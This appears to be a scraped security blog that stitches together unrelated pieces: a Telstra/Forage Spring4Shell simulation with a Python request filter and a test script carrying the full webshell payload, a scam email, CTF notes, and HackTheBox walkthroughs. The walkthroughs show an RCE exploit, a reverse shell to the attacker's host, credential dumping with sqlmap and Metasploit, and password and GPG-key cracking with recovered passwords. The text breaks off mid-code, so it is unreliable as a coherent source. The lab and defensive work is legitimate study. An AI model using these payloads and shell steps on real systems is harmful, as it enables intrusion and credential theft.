**Type of Attack:** Our analysis of the firewall logs indicates a Spring4Shell (CVE-2022-22965) malware attack targeting the **NBN Connection service (nbn.external.network)**. The attack involves multiple POST requests to `/tomcatwar.jsp` with malicious payloads designed to exploit the Spring Framework vulnerability.
**Characteristics to Block:** - **Request Path:** `/tomcatwar.jsp` - **HTTP Method:** `POST` - **Specific Payload Patterns:** Requests containing parameters such as `class.module.classLoader.resources.context.parent.pipeline.first.pattern` and related malicious payloads.
**Request:** Please implement a firewall rule to block incoming POST requests to the `/tomcatwar.jsp` endpoint and inspect for the presence of the aforementioned malicious payload patterns in the request data. This should help mitigate the distributed nature of the attack by targeting the specific exploit characteristics rather than individual IP addresses.
**Additional Information:** The attack has been distributed across multiple IP addresses within the AU region. Blocking the specific request patterns will provide a more effective mitigation strategy. Attached is a proof of concept payload that demonstrates how the attacker scripts this attack, which may aid in refining the firewall rules.
For any questions or issues, don’t hesitate to reach out to us.
Kind regards, Telstra Security Operations
This email provided the Networks Team with the necessary details to develop targeted firewall rules, enhancing the organization’s defensive measures against the attack.
Task 3: Implementing Firewall Rules with Python
Developing a Python-Based Firewall Rule
To mitigate the attack effectively, a Python script was developed to implement a firewall rule that filters incoming traffic based on the identified malicious request characteristics. The goal was to block malicious POST requests to the /tomcatwar.jsp endpoint without relying on IP-based blocking, which is less effective against distributed attacks.
defdo_POST(self): # Check if the request path is the targeted endpoint if self.path == '/tomcatwar.jsp': # Retrieve and decode the request body content_length = int(self.headers.get('Content-Length', 0)) body = self.rfile.read(content_length).decode('utf-8') params = urllib.parse.parse_qs(body) # Check for the presence of any malicious parameters ifany(param in params for param in MALICIOUS_PARAMS): block_request(self) return else: allow_request(self) return else: # For all other POST requests, allow them allow_request(self)
deflog_message(self, format, *args): # Override to suppress default logging return
if __name__ == "__main__": server = HTTPServer((host, port), ServerHandler) print("[+] Firewall Server") print("[+] HTTP Web Server running on: %s:%s" % (host, port))
server.server_close() print("[+] Server terminated. Exiting...") exit(0)
Testing the Firewall Rule
A complementary script, test_requests.py, was utilized to simulate both malicious and benign requests to ensure the firewall rule functioned as intended.
# Test Requester.py # www.theforage.com - Telstra Cyber Task 3 # Test Requester
import http.client
host = "localhost" port = 8000
defmain(): target = f"{host}:{port}" print(f"[+] Beginning test requests to: {target}") successful_responses = 0
for x inrange(5): payload = ( "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(" "%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di." "getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20" "%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%" "7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module." "classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader." "resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent." "pipeline.first.fileDateFormat=" ) print(f"[{x + 1}/5]: Making test request to {target} with payload: {payload}") conn = http.client.HTTPConnection(target)
print("[+] Test completed.") print(f"[+] Successful responses: {successful_responses}/5")
if __name__ == "__main__": main()
Troubleshooting: Addressing Port Conflicts
During the deployment of the firewall_server.py script, an error was encountered:
1
OSError: [Errno 48] Address already in use
This indicated that port 8000 was occupied by another process, preventing the firewall server from binding to it. The following steps were undertaken to resolve the issue:
Identifying the Occupying Process:
Using the lsof command:
1
lsof -i :8000
This command revealed the Process ID (PID) of the application using port 8000.
Terminating the Conflicting Process:
The identified process was terminated using the kill command:
1
kill -9 <PID>
Replace <PID> with the actual Process ID obtained from the previous step.
Verifying Port Availability:
Ensuring that port 8000 was free by rerunning the lsof command:
1
lsof -i :8000
No output indicates that the port is now free.
Restarting the Firewall Server:
After freeing up the port, the firewall_server.py script was successfully executed:
1
python3 firewall_server.py
The server started without issues, indicating that it was listening on the designated port.
Alternative Solution: Changing the Server Port
If port 8000 remains consistently in use, an alternative approach involves changing the server to listen on a different port (e.g., 8080). This requires updating both the firewall_server.py and test_requests.py scripts to reflect the new port number.
Edit firewall_server.py:
Modify the port variable:
1 2
host = "localhost" port = 8080
Edit test_requests.py:
Update the port number accordingly:
1 2
host = "localhost" port = 8080
Run the Modified Server:
1
python3 firewall_server.py
Run the Test Requester:
1
python3 test_requests.py
This ensures that the firewall rule is correctly applied on the new port.
Task 4: Incident Postmortem and Lessons Learned
Incident Postmortem: Spring4Shell Malware Attack on NBN Connection Service
Summary
On March 20th, 2024, at 14:20 UTC, Telstra’s Security Operations Centre (SOC) detected a P1 - Critical malware attack targeting the NBN Connection service (nbn.external.network), operating on Spring Framework 5.3.0. The attack involved multiple malicious POST requests to the /tomcatwar.jsp endpoint, exploiting the Spring4Shell (CVE-2022-22965) vulnerability. The incident was identified through firewall log analysis and was successfully mitigated two hours after detection by implementing a targeted firewall rule. Key teams involved in the response included the Security Operations Centre and the NBN Team.
Impact
Service Disruption: The NBN Connection service experienced significant downtime, impairing high-speed internet connectivity for customers relying on this infrastructure.
Operational Impairment: Critical services dependent on the NBN Connection, such as remote communications and business operations, were temporarily affected.
Potential Data Exposure: Although no data breaches were confirmed, the nature of the attack posed a risk of unauthorized command execution and potential data exfiltration.
Detection
The incident was discovered through routine monitoring of firewall logs by the SOC. Analysis revealed a pattern of multiple POST requests to the /tomcatwar.jsp endpoint originating from several IP addresses within the AU region. These requests contained specific malicious payloads characteristic of the Spring4Shell vulnerability, including parameters like class.module.classLoader.resources.context.parent.pipeline.first.pattern and others designed to execute remote commands.
Root Cause
The root cause of the incident was the exploitation of the Spring4Shell (CVE-2022-22965) vulnerability within the Spring Framework 5.3.0 used by the NBN Connection service. Attackers crafted malicious POST requests to the /tomcatwar.jsp endpoint, embedding payloads that leveraged this vulnerability to execute arbitrary commands on the server, leading to service disruption and impaired functionality.
Resolution
To mitigate the attack, the SOC collaborated with the Networks Team to implement a targeted firewall rule using a Python-based HTTP server (firewall_server.py). The rule specifically blocked incoming POST requests to the /tomcatwar.jsp endpoint that contained the identified malicious parameters. This measure effectively halted the ongoing attack within two hours of its initiation, restoring the NBN Connection service to operational status and preventing further unauthorized access.
Action Items
Immediate Actions:
Firewall Rule Implementation: Successfully deployed a Python-scripted firewall rule to block malicious POST requests targeting the /tomcatwar.jsp endpoint.
Service Restoration: Coordinated with the Networks Team to ensure the NBN Connection service was promptly restored to normal operations.
Short-Term Actions:
Vulnerability Patching: Upgrade the Spring Framework to the latest version to eliminate the exploited Spring4Shell vulnerability.
Enhanced Monitoring: Increase the frequency and depth of firewall log reviews to detect similar or new attack patterns more swiftly.
Incident Documentation: Complete detailed documentation of the incident for future reference and compliance purposes.
Long-Term Actions:
Security Training: Conduct training sessions for the SOC and relevant teams on identifying and responding to similar vulnerabilities and attack vectors.
Comprehensive Security Audit: Perform a thorough security audit of all critical services to identify and remediate potential vulnerabilities.
Automation of Response Mechanisms: Develop automated scripts and tools to detect and mitigate such attacks in real-time, reducing response times.
Collaboration with Development Teams: Work closely with development teams to ensure secure coding practices are followed, particularly when using frameworks like Spring.
Future Prevention:
Regular Updates and Patching: Establish a routine schedule for updating and patching all software frameworks and dependencies to minimize vulnerability exposure.
Advanced Threat Detection Systems: Invest in more sophisticated threat detection and prevention systems that can identify and block complex attack patterns.
Incident Response Drills: Conduct regular incident response drills to ensure all teams are prepared to handle similar attacks efficiently.
Lessons Learned
Proactive Monitoring: Continuous and proactive monitoring of firewall logs is essential in the early detection of potential threats.
Collaborative Response: Effective communication and collaboration between the SOC and infrastructure teams are critical in swiftly mitigating attacks.
Automation and Scripting: Utilizing scripting languages like Python for developing automated firewall rules can significantly enhance response times and accuracy.
Regular Patching: Keeping all software frameworks and dependencies up-to-date is vital in preventing exploitation of known vulnerabilities.
Comprehensive Documentation: Maintaining detailed incident postmortems aids in future governance, risk management, and compliance efforts while educating the team on handling similar incidents.
Conclusion
This incident underscored the importance of robust monitoring, swift response mechanisms, and collaborative efforts in combating sophisticated malware attacks. By implementing targeted firewall rules and adhering to best practices in incident response, Telstra effectively mitigated the Spring4Shell attack, ensuring the continuity of its critical services and reinforcing its commitment to cybersecurity excellence.
Prepared by: Telstra Security Operations Date: April 27, 2024
Hello dear user, I am Larry Page and I am delighted to announce to you that= you are the 99999999th GMAIL account and for that we want to reward you. = You've earned $1,000,000. To claim your prize open the attached file. ----_NmP-426c22a2e0d8fc9a-Part_2 Content-Type: text/html; charset=utf-8 Content-Transfer-Encoding: quoted-printable
<p>Hello dear user, I am Larry Page and I am delighted to announce to you = that you are the 99999999th GMAIL account and for that we want to reward = you. You've earned $1,000,000. To claim your prize open the attached file.= <br></p> ----_NmP-426c22a2e0d8fc9a-Part_2--
# 循环提取 ZIP 文件 while [ -f "$filename" ]; do # 提取当前 ZIP 文件中的所有内容 unzip -o "$filename" # 找到下一个 ZIP 文件 next_zip=$(find . -name "*.zip" | head -n 1) # 如果找到新的 ZIP 文件,更新 filename,否则跳出循环 if [ -n "$next_zip" ]; then filename="$next_zip" else echo "Extraction complete or no more ZIP files found." break fi done
~/Desktop/testtest/ hexdump -C message.txt 00000000 ff fe 68 00 fe ff 00 65 ff fe 32 00 fe ff 00 30 |..h....e..2....0| 00000010 ff fe 32 00 fe ff 00 33 ff fe 7b 00 fe ff 00 75 |..2....3..{....u| 00000020 ff fe 37 00 fe ff 01 92 ff fe 5f 00 fe ff 00 62 |..7......._....b| 00000030 ff fe 30 00 fe ff 00 6d ff fe 35 00 fe ff 00 73 |..0....m..5....s| 00000040 ff fe 5f 00 fe ff 00 38 ff fe 72 00 fe ff 15 f1 |.._....8..r.....| 00000050 ff fe 5f 00 fe ff 00 6e ff fe 30 00 fe ff 00 37 |.._....n..0....7| 00000060 ff fe 5f 00 fe ff 00 38 ff fe 63 31 fe ff 00 77 |.._....8..c1...w| 00000070 ff fe 61 00 fe ff 00 79 ff fe 35 00 fe ff 00 5f |..a....y..5...._| 00000080 ff fe 31 00 fe ff 00 67 ff fe 6e 00 fe ff 00 30 |..1....g..n....0| 00000090 ff fe 72 00 fe ff 15 f1 ff fe 64 00 fe ff 00 7d |..r.......d....}| 000000a0
提取出flag:
1
he2023{u7_b0m5s_8r_n07_8c1way5_1gn0rd}
Rotational
题目:
1
96a_abL_?b04c?0Cbc50C_E_C03c4<HcC5DN
任务是解密这段文本,(flag)。初步尝试使用常见的 ROT13 等简单的旋转密码未能成功,提示“the rotor must have been too fast!”暗示可能使用了更复杂的旋转算法。
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Invalidated] └─# nmap -sC -sV $(cat ip.txt) Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-30 23:26 AEST Nmap scan report for invalidated.htb (10.129.233.58) Host is up (0.015s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA) |_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Sign up |_http-server-header: nginx/1.18.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.09 seconds
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Rental] └─# nmap -sC -sV $(cat ip.txt) Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 19:58 AEST Nmap scan report for 10.129.96.12 Host is up (0.010s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA) | 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA) |_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-title: Mixt Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.15 seconds
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Rental] └─# dirsearch -u "http://10.129.96.12" -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict
www-data@rental:/var/www/html/admin$ mysql -u manager -p'password#1' car_rental_db Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 217 Server version: 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h'forhelp. Type '\c' to clear the current input statement.
MariaDB [car_rental_db]> SHOW GRANTS FOR 'manager'@'localhost'; +---------------------------------------------------------------------------------------------------------------+ | Grants for manager@localhost | +---------------------------------------------------------------------------------------------------------------+ | GRANT FILE ON *.* TO `manager`@`localhost` IDENTIFIED BY PASSWORD '*A778F55EAE542DA23ED0F6351B01262EFFD3BBB0' | | GRANT ALL PRIVILEGES ON `car_rental_db`.* TO `manager`@`localhost` | +---------------------------------------------------------------------------------------------------------------+ 2 rows inset (0.000 sec)
Tips: There are at least two exploitable vulnerabilities in HelpDeskZ 1.0.2. There’s an authenticated SQL injection that will allow you to read a SHA1 hash from the database and crack it, allowing for SSH access. There’s also an arbirtray file upload vulnerability that will allow you to upload a webshell and get execution that way. Either way, you end up with a shell as the same user.
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] └─# nmap -p- $IP Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 20:43 AEST Nmap scan report for bizness.htb (10.129.232.1) Host is up (0.040s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 443/tcp open https 41845/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 12.65 seconds
1
echo"10.129.232.1 bizness.htb" | sudo tee -a /etc/hosts
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] └─# update-alternatives --config java There are 3 choices for the alternative java (providing /usr/bin/java).
Press <enter> to keep the current choice[*], or type selection number: 1 update-alternatives: using /usr/lib/jvm/java-11-openjdk-arm64/bin/java to provide /usr/bin/java (java) in manual mode ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] └─# java --version openjdk 11.0.20-ea 2023-07-18 OpenJDK Runtime Environment (build 11.0.20-ea+7-post-Debian-1) OpenJDK 64-Bit Server VM (build 11.0.20-ea+7-post-Debian-1, mixed mode)
开启tcpdump
1
sudo tcpdump -i 2 icmp
运行POC
1 2 3
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] └─# python3 exploit.py https://bizness.htb rce "ping -c 5 10.10.14.8" Not Sure Worked or not
查看抓到的数据包:
1 2 3 4 5 6 7 8
┌──(root@kali)-[/home/h4m5t/Desktop] └─# tcpdump -i 2 icmp tcpdump: verbose output suppressed, use -v[v]... for full protocol decode listening on any, link-type LINUX_SLL2 (Linux cooked v2), snapshot length 262144 bytes 21:47:38.693694 tun0 In IP bizness.htb > 10.10.14.8: ICMP echo request, id 55668, seq 1, length 64 21:47:38.693728 tun0 Out IP 10.10.14.8 > bizness.htb: ICMP echo reply, id 55668, seq 1, length 64 21:47:39.695235 tun0 In IP bizness.htb > 10.10.14.8: ICMP echo request, id 55668, seq 2, length 64 21:47:39.695274 tun0 Out IP 10.10.14.8 > bizness.htb: ICMP echo reply, id 55668, seq 2, length 64
说明RCE成功,现在进行反向shell
首先开启nc监听,再运行exp
1
nc -nlvp 4444
1 2 3
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] └─# python3 exploit.py https://bizness.htb shell 10.10.14.8:4444 Not Sure Worked or not
ofbiz@bizness:/opt/ofbiz/framework/security/config$ cat security.properties | grep hash <ecurity/config$ cat security.properties | grep hash # -- specify the type of hash to use for one-way encryption, will be passed to java.security.MessageDigest.getInstance() -- password.encrypt.hash.type=SHA
cat HashCrypt.java /******************************************************************************* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. *******************************************************************************/ package org.apache.ofbiz.base.crypto;
privatestaticbooleandoCompareTypePrefix(String crypted, String defaultCrypt, byte[] bytes) { inttypeEnd= crypted.indexOf("}"); StringhashType= crypted.substring(1, typeEnd); Stringhashed= crypted.substring(typeEnd + 1); MessageDigestmessagedigest= getMessageDigest(hashType); messagedigest.update(bytes); byte[] digestBytes = messagedigest.digest(); char[] digestChars = Hex.encodeHex(digestBytes); StringcheckCrypted=newString(digestChars); if (hashed.equals(checkCrypted)) { returntrue; } // This next block should be removed when all {prefix}oldFunnyHex are fixed. if (hashed.equals(oldFunnyHex(digestBytes))) { Debug.logWarning("Warning: detected oldFunnyHex password prefixed with a hashType; this is not valid, please update the value in the database with ({%s}%s)", module, hashType, checkCrypted); returntrue; } returnfalse; }
/* * @deprecated use cryptBytes(hashType, salt, password); eventually, use * cryptUTF8(hashType, salt, password) after all existing installs are * salt-based. If the call-site of cryptPassword is just used to create a *new* * value, then you can switch to cryptUTF8 directly. */ @Deprecated publicstatic String cryptPassword(String hashType, String salt, String password) { if (hashType.startsWith("PBKDF2")) { return password != null ? pbkdf2HashCrypt(hashType, salt, password) : null; } return password != null ? cryptBytes(hashType, salt, password.getBytes(UtilIO.getUtf8())) : null; }
messagedigest.update(strBytes); return oldFunnyHex(messagedigest.digest()); } catch (Exception e) { Debug.logError(e, "Error while computing hash of type " + hashType, module); } return str; }
// This next block should be removed when all {prefix}oldFunnyHex are fixed. privatestatic String oldFunnyHex(byte[] bytes) { intk=0; char[] digestChars = newchar[bytes.length * 2]; for (byte b : bytes) { inti1= b;
Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Minimim salt length supported by kernel: 0 Maximum salt length supported by kernel: 256
ATTENTION! Pure (unoptimized) backend kernels selected. Pure kernels can crack longer passwords, but drastically reduce performance. If you want to switch to optimized kernels, append -O to your commandline. See the above message to find out about the exact limits.
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed.
graph LR A[Attacker crafts<br>malicious payload<br>with JNDI lookup] --> C{Log4j parses:<br>Contains JNDI lookup?} C -->|Yes| D[Execute<br>JNDI lookup] C -->|No| E[Normal log] D --> F[Connect to<br>attacker's server] F --> G[Download &<br>execute<br>malicious codes] G --> H[Attacker gains<br>server control]
Incident Timeline
timeline title Log4j Vulnerability Incident Timeline November 24, 2021 : Alibaba researchers discovered Log4Shell and reported it to Apache December 10, 2021 : Apache disclosed the Log4j vulnerability (CVSS score 10.0) December 13, 2021 : Bitdefender reported attempts to exploit Log4j for Khonsari ransomware December 22, 2021 : U.S. CISA, FBI, NSA, and Five Eyes Alliance issued a joint security alert December 23, 2021 : Belgium Ministry of Defense confirmed Log4j attack December 2021 : Apache released 4 patches to fully fix the Log4j vulnerability
缓解措施
Log4j漏洞,也称为**Log4Shell (CVE-2021-44228)**,是一个严重的远程代码执行(RCE)漏洞,影响了 Apache Log4j 2 版本。这一漏洞允许攻击者通过向日志记录输入恶意的JNDI(Java Naming and Directory Interface)查找字符串,触发服务器下载和执行恶意代码。
┌──(root@kali)-[/home/h4m5t/Desktop/HTB] └─# nmap -sV $IP Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 14:53 AEST Stats: 0:02:29 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 66.67% done; ETC: 14:57 (0:01:15 remaining) Nmap scan report for 10.129.231.241 Host is up (0.0093s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp? 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) 80/tcp open http nginx 1.18.0 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 161.02 seconds
If we go to http://$IP, we are redirected to http://metapress.htb, so we need to add this domain in /etc/hosts
[15:30:38] [INFO] the back-end DBMS is MySQL web application technology: PHP 8.0.24, Nginx 1.18.0 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [15:30:38] [INFO] fetching database names available databases [2]: [*] blog [*] information_schema
[15:30:38] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/metapress.htb'
[15:38:24] [INFO] table 'blog.wp_users' dumped to CSV file '/root/.local/share/sqlmap/output/metapress.htb/dump/blog/wp_users.csv' [15:38:24] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/metapress.htb'
# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/gather/wp_bookingpress_category_services_sqli 2022-02-28 normal Yes Wordpress BookingPress bookingpress_front_get_category_services SQLi
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/gather/wp_bookingpress_category_services_sqli
msf6 > use 0 msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set RHOST metapress.htb RHOST => metapress.htb msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set TARGETURI /events/ TARGETURI => /events/ msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > run [*] Running module against 10.129.231.241
[*] Running automatic check ("set AutoCheck false" to disable) [+] The target is vulnerable. [*] Extracting credential information Wordpress User Credentials ==========================
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] └─# john --wordlist=/usr/share/wordlists/rockyou.txt user.hash Created directory: /root/.john Using default input encoding: UTF-8 Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 128/128 ASIMD 4x2]) Cost 1 (iteration count) is 8192 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status partylikearockstar (manager)
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] └─# ftp metapress.htb@$IP Connected to 10.129.231.241. 220 ProFTPD Server (Debian) [::ffff:10.129.231.241] 331 Password required for metapress.htb Password: 230 User metapress.htb logged in Remote system type is UNIX. Using binary mode to transfer files. ftp>
First let us generate the password hash from the private GPG key using gpg2john and save it into a file named key.hash 运行john时报错:
1
Crash recovery file is locked: /root/.john/john.rec
解决方法:
1
rm /root/.john/john.rec
开始爆破:
1 2 3 4 5 6 7 8 9 10 11 12 13
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] └─# john -wordlist=/usr/share/wordlists/rockyou.txt key.hash Using default input encoding: UTF-8 Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64]) Cost 1 (s2k-count) is 65011712 for all loaded hashes Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 7 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status blink182 (Passpie) 1g 0:00:00:02 DONE (2024-09-15 17:48) 0.3937g/s 75.59p/s 75.59c/s 75.59C/s carolina..november Use the "--show" option to display all of the cracked passwords reliably Session completed.
COMMANDS: webscan, ws Run a webscan task servicescan, ss Run a service scan task subdomain, sd Run a subdomain task poclint, pl, lint lint yaml poc burp-gamma, btg Convert the export file of burp historical proxy records to POC format transform transform other script to gamma reverse Run a standalone reverse server convert convert results from json to html or from html to json genca GenerateToFile CA certificate and key upgrade check new version and upgrade self if any updates found version Show version info x A command that enables all plugins. You can customize new commands or modify the plugins enabled by a command in the configuration file. help, h Shows a list of commands or help for one command
GLOBAL OPTIONS: --config FILE Load configuration from FILE (default: "config.yaml") --log-level value Log level, choices are debug, info, warn, error, fatal --help, -h show help [INFO] 2023-09-21 17:36:22 [default:entry.go:226] Loading config file from config.yaml
OPTIONS: --list, -l list plugins --plugins value, --plugin value, --plug value specify the plugins to run, separated by ',' --poc value, -p value specify the poc to run, separated by ',' --level value specify the level of poc to run, separated by ',' --tags value specify the level of poc to run, separated by ','
--listen value use proxy resource collector, value is proxy addr, (example: 127.0.0.1:1111) --basic-crawler value, --basic value use a basic spider to crawl the target and scan the requests --browser-crawler value, --browser value use a browser spider to crawl the target and scan the requests --url-file value, --uf value read urls from a local file and scan these urls, one url per line --burp-file value, --bf value read requests from burpsuite exported file as targets --url value, -u value scan a **single** url --data value, -d value data string to be sent through POST (e.g. 'username=admin') --raw-request FILE, --rr FILE load http raw request from a FILE --force-ssl, --fs force usage of SSL/HTTPS for raw-request
--json-output FILE, --jo FILE output xray results to FILE in json format --html-output FILE, --ho FILE output xray result to FILE in HTML format --webhook-output value, --wo value post xray result to url in json format
[INFO] 2023-09-21 17:03:17 [default:entry.go:226] Loading config file from config.yaml
Enabled plugins: [phantasm]
[INFO] 2023-09-21 17:03:18 [phantasm:phantasm.go:114] found local poc .\POC\yaml-poc-fit2cloud-jumpserver-unauthorized_access-CVE-2023-42442.yml [INFO] 2023-09-21 17:03:18 [phantasm:phantasm.go:185] 1 pocs have been loaded (debug level will show more details) [INFO] 2023-09-21 17:03:18 [default:dispatcher.go:444] processing GET http://example.com/ [Vuln: phantasm] Target "http://example.com/" VulnType "poc-yaml-jumpserver-session-replay-unauth/default" Author "Chaitin" Links ["https://stack.chaitin.com/techblog/detail/156"]
[*] All pending requests have been scanned [*] scanned: 1, pending: 0, requestSent: 2, latency: 40.50ms, failedRatio: 0.00% [INFO] 2023-09-21 17:03:19 [controller:dispatcher.go:573] controller released, task done
C:\Users\h4m5t\Downloads\nss-3.11\nss-3.11\bin>certutil.exe -H -A Add a certificate to the database (create if needed) -E Add an Email certificate to the database (create if needed) -n cert-name Specify the nickname of the certificate to add -t trustargs Set the certificate trust attributes: p valid peer P trusted peer (implies p) c valid CA T trusted CA to issue client certs (implies c) C trusted CA to issue server certs (implies c) u user cert w send warning g make step-up cert -f pwfile Specify the password file -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -a The input certificate is encoded in ASCII (RFC1113) -i input Specify the certificate file (default is stdin)
-C Create a new binary certificate from a BINARY cert request -c issuer-name The nickname of the issuer cert -i cert-request The BINARY certificate request file -o output-cert Output binary cert to this file (default is stdout) -x Self sign -m serial-number Cert serial number -w warp-months Time Warp -v months-valid Months valid (default is 3) -f pwfile Specify the password file -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -1 Create key usage extension -2 Create basic constraint extension -3 Create authority key ID extension -4 Create crl distribution point extension -5 Create netscape cert type extension -6 Create extended key usage extension -7 Create an email subject alt name extension -8 Create an dns subject alt name extension
-G Generate a new key pair -h token-name Name of token in which to generate key (default is internal) -k key-type Type of key pair to generate ("dsa", "rsa" (default)) -g key-size Key size in bits, (min 512, max 2048, default 1024) -y exp Set the public exponent value (3, 17, 65537) (rsa only) -f password-file Specify the password file -z noisefile Specify the noise file to be used -q pqgfile read PQG value from pqgfile (dsa only) -d keydir Key database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix
-D Delete a certificate from the database -n cert-name The nickname of the cert to delete -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix
-U List all modules -d moddir Module database directory (default is '~/.netscape') -P dbprefix Cert & Key database prefix -X force the database to open R/W
-K List all keys -h token-name Name of token in which to look for keys (default is internal, use "all" to list keys on all tokens) -k key-type Type of key pair to list ("all", "dsa", "rsa" (default)) -f password-file Specify the password file -d keydir Key database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -X force the database to open R/W
-L List all certs, or print out a single named cert -n cert-name Pretty print named cert (list all if unspecified) -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -X force the database to open R/W -r For single cert, print binary DER encoding -a For single cert, print ASCII encoding (RFC1113)
-M Modify trust attributes of certificate -n cert-name The nickname of the cert to modify -t trustargs Set the certificate trust attributes (see -A above) -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix
